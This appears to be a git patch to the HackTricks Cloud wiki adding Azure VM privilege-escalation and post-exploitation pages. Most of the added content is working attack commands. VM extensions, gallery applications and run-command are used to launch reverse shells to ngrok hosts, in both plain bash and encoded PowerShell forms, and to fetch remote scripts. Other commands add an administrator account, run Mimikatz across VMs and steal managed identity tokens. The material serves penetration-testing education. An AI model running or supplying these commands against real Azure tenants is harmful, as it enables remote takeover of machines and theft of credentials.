From b2956ac67275fbbb552b094065adfdad09a51e33 Mon Sep 17 00:00:00 2001 From: CPol Date: Thu, 5 Dec 2024 12:43:30 +0000 Subject: [PATCH] GITBOOK-724: No subject --- SUMMARY.md | 9 +- .../az-vms-and-network-post-exploitation.md | 43 ++ ...az-virtual-machines-and-network-privesc.md | 396 ++++++++++++++++++ .../azure-security/az-services/vms/README.md | 151 +++++-- .../az-vms-unath.md | 69 +++ 5 files changed, 636 insertions(+), 32 deletions(-) create mode 100644 pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md create mode 100644 pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md create mode 100644 pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md diff --git a/SUMMARY.md b/SUMMARY.md index 4e523a7044..3a62487199 100644 --- a/SUMMARY.md +++ b/SUMMARY.md @@ -396,6 +396,7 @@ * [Az - Enumeration Tools](pentesting-cloud/azure-security/az-enumeration-tools.md) * [Az - Unauthenticated Enum & Initial Entry](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/README.md) * [Az - OAuth Apps Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-oauth-apps-phishing.md) + * [Az - VMs Unath](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md) * [Az - Device Code Authentication Phishing](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md) * [Az - Password Spraying](pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md) * [Az - Services](pentesting-cloud/azure-security/az-services/README.md) @@ -437,12 +438,13 @@ * [Az - Processes Memory Access Token](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-processes-memory-access-token.md) * [Az - Primary Refresh Token (PRT)](pentesting-cloud/azure-security/az-lateral-movement-cloud-on-prem/az-primary-refresh-token-prt.md) * [Az - Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/README.md) - * [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) - * [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) - * [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md) * [Az - Blob Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md) + * [Az - File Share Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md) + * [Az - Key Vault Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md) * [Az - Queue Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md) * [Az - Service Bus Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md) + * [Az - Table Storage Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md) + * [Az - VMs & Network Post Exploitation](pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md) * [Az - Privilege Escalation](pentesting-cloud/azure-security/az-privilege-escalation/README.md) * [Az - Azure IAM Privesc (Authorization)](pentesting-cloud/azure-security/az-privilege-escalation/az-authorization-privesc.md) * [Az - EntraID Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-entraid-privesc/README.md) @@ -451,6 +453,7 @@ * [Az - Key Vault Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md) * [Az - Queue Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-queue-privesc.md) * [Az - Service Bus Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-servicebus-privesc.md) + * [Az - Virtual Machines & Network Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md) * [Az - Storage Privesc](pentesting-cloud/azure-security/az-privilege-escalation/az-storage-privesc.md) * [Az - Persistence](pentesting-cloud/azure-security/az-persistence/README.md) * [Az - Storage Persistence](pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md) diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md new file mode 100644 index 0000000000..ee8f3ff801 --- /dev/null +++ b/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md @@ -0,0 +1,43 @@ +# Az - VMs & Network Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## VMs & Network + +For more info about Azure VMs and networking check the following page: + +{% content-ref url="../az-services/vms/" %} +[vms](../az-services/vms/) +{% endcontent-ref %} + +### VM Application Pivoting + +VM applications can be shared with other subscriptions and tenants. If an application is being shared it's probably because it's being used. So if the attacker manages to **compromise the application and uploads a backdoored** version it might be possible that it will be **executed in another tenant or subscription**. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md b/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md new file mode 100644 index 0000000000..ff195b69db --- /dev/null +++ b/pentesting-cloud/azure-security/az-privilege-escalation/az-virtual-machines-and-network-privesc.md @@ -0,0 +1,396 @@ +# Az - Virtual Machines & Network Privesc + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Basic Information + +For more info about Azure Virtual Machines and Network check: + +{% content-ref url="../az-services/vms/" %} +[vms](../az-services/vms/) +{% endcontent-ref %} + +### **`Microsoft.Compute/virtualMachines/extensions/write`** + +This permission allows to execute extensions in virtual machines which allow to **execute arbitrary code on them**.\ +Example abusing custom extensions to execute arbitrary commands in a VM: + +{% tabs %} +{% tab title="Linux" %} +* Execute a revers shell + +{% code overflow="wrap" %} +```bash +# Prepare the rev shell +echo -n 'bash -i >& /dev/tcp/2.tcp.eu.ngrok.io/13215 0>&1' | base64 +YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== + +# Execute rev shell +az vm extension set \ + --resource-group \ + --vm-name \ + --name CustomScript \ + --publisher Microsoft.Azure.Extensions \ + --version 2.1 \ + --settings '{}' \ + --protected-settings '{"commandToExecute": "nohup echo YmFzaCAtaSAgPiYgL2Rldi90Y3AvMi50Y3AuZXUubmdyb2suaW8vMTMyMTUgMD4mMQ== | base64 -d | bash &"}' +``` +{% endcode %} + +* Execute a script located on the internet + +{% code overflow="wrap" %} +```bash +az vm extension set \ + --resource-group rsc-group> \ + --vm-name \ + --name CustomScript \ + --publisher Microsoft.Azure.Extensions \ + --version 2.1 \ + --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/8ce279967be0855cc13aa2601402fed3/raw/72816c3603243cf2839a7c4283e43ef4b6048263/hacktricks_touch.sh"]}' \ + --protected-settings '{"commandToExecute": "sh hacktricks_touch.sh"}' +``` +{% endcode %} +{% endtab %} + +{% tab title="Windows" %} +* Execute a reverse shell + +{% code overflow="wrap" %} +```bash +# Get encoded reverse shell +echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 + +# Execute it +az vm extension set \ + --resource-group \ + --vm-name \ + --name CustomScriptExtension \ + --publisher Microsoft.Compute \ + --version 1.10 \ + --settings '{}' \ + --protected-settings '{"commandToExecute": "powershell.exe -EncodedCommand JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA="}' + +``` +{% endcode %} + +* Execute reverse shell from file + +{% code overflow="wrap" %} +```bash +az vm extension set \ + --resource-group \ + --vm-name \ + --name CustomScriptExtension \ + --publisher Microsoft.Compute \ + --version 1.10 \ + --settings '{"fileUris": ["https://gist.githubusercontent.com/carlospolop/33b6d1a80421694e85d96b2a63fd1924/raw/d0ef31f62aaafaabfa6235291e3e931e20b0fc6f/ps1_rev_shell.ps1"]}' \ + --protected-settings '{"commandToExecute": "powershell.exe -ExecutionPolicy Bypass -File ps1_rev_shell.ps1"}' +``` +{% endcode %} + +You could also execute other payloads like: `powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add` + +* Reset password using the VMAccess extension + +{% code overflow="wrap" %} +```powershell +# Run VMAccess extension to reset the password +$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password +Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred +``` +{% endcode %} +{% endtab %} +{% endtabs %} + +It's also possible to abuse well-known extensions to execute code or perform privileged actions inside the VMs: + +
+ +VMAccess extension + +This extension allows to modify the password (or create if it doesn't exist) of users inside Windows VMs. + +{% code overflow="wrap" %} +```powershell +# Run VMAccess extension to reset the password +$cred=Get-Credential # Username and password to reset (if it doesn't exist it'll be created). "Administrator" username is allowed to change the password +Set-AzVMAccessExtension -ResourceGroupName "" -VMName "" -Name "myVMAccess" -Credential $cred +``` +{% endcode %} + +
+ +
+ +DesiredConfigurationState (DSC) + +This is a **VM extensio**n that belongs to Microsoft that uses PowerShell DSC to manage the configuration of Azure Windows VMs. Therefore, it can be used to **execute arbitrary commands** in Windows VMs through this extension: + +```powershell +# Content of revShell.ps1 +Configuration RevShellConfig { + Node localhost { + Script ReverseShell { + GetScript = { @{} } + SetScript = { + $client = New-Object System.Net.Sockets.TCPClient('attacker-ip',attacker-port); + $stream = $client.GetStream(); + [byte[]]$bytes = 0..65535|%{0}; + while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ + $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i); + $sendback = (iex $data 2>&1 | Out-String ); + $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; + $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); + $stream.Write($sendbyte, 0, $sendbyte.Length) + } + $client.Close() + } + TestScript = { return $false } + } + } +} +RevShellConfig -OutputPath .\Output + +# Upload config to blob +$resourceGroup = 'dscVmDemo' +$storageName = 'demostorage' +Publish-AzVMDscConfiguration ` + -ConfigurationPath .\revShell.ps1 ` + -ResourceGroupName $resourceGroup ` + -StorageAccountName $storageName ` + -Force + +# Apply DSC to VM and execute rev shell +$vmName = 'myVM' +Set-AzVMDscExtension ` + -Version '2.76' ` + -ResourceGroupName $resourceGroup ` + -VMName $vmName ` + -ArchiveStorageAccountName $storageName ` + -ArchiveBlobName 'revShell.ps1.zip' ` + -AutoUpdate ` + -ConfigurationName 'RevShellConfig' +``` + +
+ +
+ +Hybrid Runbook Worker + +This is a VM extension that would allow to execute runbooks in VMs from an automation account. For more information check the [Automation Accounts service](../az-services/az-automation-account/). + +
+ +### `Microsoft.Compute/disks/write, Microsoft.Network/networkInterfaces/join/action, Microsoft.Compute/virtualMachines/write, (Microsoft.Compute/galleries/applications/write, Microsoft.Compute/galleries/applications/versions/write)` + +These are the required permissions to **create a new gallery application and execute it inside a VM**. Gallery applications can execute anything so an attacker could abuse this to compromise VM instances executing arbitrary commands. + +The last 2 permissions might be avoided by sharing the application with the tenant. + +Exploitation example to execute arbitrary commands: + +{% tabs %} +{% tab title="Linux" %} +```bash +# Create gallery (if the isn't any) +az sig create --resource-group myResourceGroup \ + --gallery-name myGallery --location "West US 2" + +# Create application container +az sig gallery-application create \ + --application-name myReverseShellApp \ + --gallery-name myGallery \ + --resource-group \ + --os-type Linux \ + --location "West US 2" + +# Create app version with the rev shell +## In Package file link just add any link to a blobl storage file +az sig gallery-application version create \ + --version-name 1.0.2 \ + --application-name myReverseShellApp \ + --gallery-name myGallery \ + --location "West US 2" \ + --resource-group \ + --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \ + --install-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \ + --remove-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" \ + --update-command "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" + +# Install the app in a VM to execute the rev shell +## Use the ID given in the previous output +az vm application set \ + --resource-group \ + --name \ + --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \ + --treat-deployment-as-failure true +``` +{% endtab %} + +{% tab title="Windows" %} +{% code overflow="wrap" %} +```bash +# Create gallery (if the isn't any) +az sig create --resource-group \ + --gallery-name myGallery --location "West US 2" + +# Create application container +az sig gallery-application create \ + --application-name myReverseShellAppWin \ + --gallery-name myGallery \ + --resource-group \ + --os-type Windows \ + --location "West US 2" + +# Get encoded reverse shell +echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 + +# Create app version with the rev shell +## In Package file link just add any link to a blobl storage file +export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" +az sig gallery-application version create \ + --version-name 1.0.0 \ + --application-name myReverseShellAppWin \ + --gallery-name myGallery \ + --location "West US 2" \ + --resource-group \ + --package-file-link "https://testing13242erih.blob.core.windows.net/testing-container/asd.txt?sp=r&st=2024-12-04T01:10:42Z&se=2024-12-04T09:10:42Z&spr=https&sv=2022-11-02&sr=b&sig=eMQFqvCj4XLLPdHvnyqgF%2B1xqdzN8m7oVtyOOkMsCEY%3D" \ + --install-command "powershell.exe -EncodedCommand $encodedCommand" \ + --remove-command "powershell.exe -EncodedCommand $encodedCommand" \ + --update-command "powershell.exe -EncodedCommand $encodedCommand" + +# Install the app in a VM to execute the rev shell +## Use the ID given in the previous output +az vm application set \ + --resource-group \ + --name deleteme-win4 \ + --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellAppWin/versions/1.0.0 \ + --treat-deployment-as-failure true +``` +{% endcode %} +{% endtab %} +{% endtabs %} + +### `Microsoft.Compute/virtualMachines/runCommand/action` + +This is the most basic mechanism Azure provides to **execute arbitrary commands in VMs:** + +{% tabs %} +{% tab title="Linux" %} +```bash +# Execute rev shell +az vm run-command invoke \ + --resource-group \ + --name \ + --command-id RunShellScript \ + --scripts @revshell.sh + +# revshell.sh file content +echo "bash -c 'bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/19159 0>&1'" > revshell.sh +``` +{% endtab %} + +{% tab title="Windows" %} +```bash +# The permission allowing this is Microsoft.Compute/virtualMachines/runCommand/action +# Execute a rev shell +az vm run-command invoke \ + --resource-group Research \ + --name juastavm \ + --command-id RunPowerShellScript \ + --scripts @revshell.ps1 + +## Get encoded reverse shell +echo -n '$client = New-Object System.Net.Sockets.TCPClient("7.tcp.eu.ngrok.io",19159);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv --to-code UTF-16LE | base64 + +## Create app version with the rev shell +## In Package file link just add any link to a blobl storage file +export encodedCommand="JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIANwAuAHQAYwBwAC4AZQB1AC4AbgBnAHIAbwBrAC4AaQBvACIALAAxADkAMQA1ADkAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=" + +# The content of +echo "powershell.exe -EncodedCommand $encodedCommand" > revshell.ps1 + + +# Try to run in every machine +Import-module MicroBurst.psm1 +Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt +``` +{% endtab %} +{% endtabs %} + +## `Microsoft.Resources/deployments/write`, `Microsoft.Network/virtualNetworks/write`, `Microsoft.Network/networkSecurityGroups/write`, `Microsoft.Network/networkSecurityGroups/join/action`, `Microsoft.Network/publicIPAddresses/write`, `Microsoft.Network/publicIPAddresses/join/action`, `Microsoft.Network/networkInterfaces/write`, `Microsoft.Compute/virtualMachines/write, Microsoft.Network/virtualNetworks/subnets/join/action`, `Microsoft.Network/networkInterfaces/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` + +All those are the necessary permissions to **create a VM with a specific managed identity** and leaving a **port open** (22 in this case). This allows a user to create a VM and connect to it and **steal managed identity tokens** to escalate privileges to it. + +Depending on the situation more or less permissions might be needed to abuse this technique. + +{% code overflow="wrap" %} +```bash +az vm create \ + --resource-group Resource_Group_1 \ + --name cli_vm \ + --image Ubuntu2204 \ + --admin-username azureuser \ + --generate-ssh-keys \ + --assign-identity /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourcegroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity \ + --nsg-rule ssh \ + --location "centralus" +# By default pub key from ~/.ssh is used (if none, it's generated there) +``` +{% endcode %} + +### `Microsoft.Compute/virtualMachines/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action` + +Those permissions are enough to **assign new managed identities to a VM**. Note that a VM can have several managed identities. It can have the **system assigned one**, and **many user managed identities**.\ +Then, from the metadata service it's possible to generate tokens for each one. + +{% code overflow="wrap" %} +```bash +# Get currently assigned managed identities to the VM +az vm identity show \ + --resource-group \ + --name + +# Assign several managed identities to a VM +az vm identity assign \ + --resource-group \ + --name \ + --identities \ + /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity1 \ + /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/TestManagedIdentity2 +``` +{% endcode %} + +Then the attacker needs to have **compromised somehow the VM** to steal tokens from the assigned managed identities. Check **more info in**: + +{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf#azure-vm" %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
